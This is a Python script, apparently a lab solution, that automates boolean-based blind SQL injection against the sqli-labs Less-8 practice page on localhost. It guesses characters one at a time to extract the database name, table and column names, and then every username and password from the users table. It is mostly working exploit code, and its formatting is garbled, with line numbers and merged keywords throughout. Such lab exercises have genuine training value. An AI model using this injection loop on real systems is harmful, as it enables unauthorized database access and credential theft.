1 #coding:utf-8
2 importrequests3
4 #获取数据库名长度
5 defdatabase_len():6 for i in range(1, 10):7 url = '''http://127.0.0.1/sqli-labs/Less-8/index.php'''
8 payload = '''?id=1' and length(database())>%s''' %i9 #print(url+payload+'%23')
10 r = requests.get(url + payload + '%23')11 if 'You are in' inr.text:12 print(i)13
14 else:15 #print('false')
16 print('database_length:', i)17 break
18
19
20 database_len()21
22 #获取数据库名
23 defdatabase_name():24 name = ''
25 for j in range(1, 9):26 for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':27 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" %(28 j, i)29 #print(url+'%23')
30 r = requests.get(url + '%23')31 if 'You are in' inr.text:32 name = name +i33
34 print(name)35
36 break
37 print('database_name:', name)38
39
40 database_name()41
42 #获取数据库表
43 deftables_name():44 name = ''
45 for j in range(1, 30):46 for i in 'abcdefghijklmnopqrstuvwxyz,':47 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" %(48 j, i)49 r = requests.get(url + '%23')50 if 'You are in' inr.text:51 name = name +i52
53 print(name)54
55 break
56 print('table_name:', name)57
58
59 tables_name()60
61
62 #获取表中字段
63 defcolumns_name():64 name = ''
65 for j in range(1, 30):66 for i in 'abcdefghijklmnopqrstuvwxyz,':67 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" %(68 j, i)69 r = requests.get(url + '%23')70 if 'You are in' inr.text:71 name = name +i72
73 print(name)74
75 break
76 print('column_name:', name)77
78
79 columns_name()80
81
82 #获取username
83 defusername_value():84 name = ''
85 for j in range(1, 100):86 for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':87 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" %(88 j, i)89 r = requests.get(url + '%23')90 if 'You are in' inr.text:91 name = name +i92
93 print(name)94
95 break
96 print('username_value:', name)97
98
99 username_value()100
101
102 #获取password
103 defpassword_value():104 name = ''
105 for j in range(1, 100):106 for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':107 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" %(108 j, i)109 r = requests.get(url + '%23')110 if 'You are in' inr.text:111 name = name +i112
113 print(name)114
115 break
116 print('password_value:', name)117
118
119 password_value()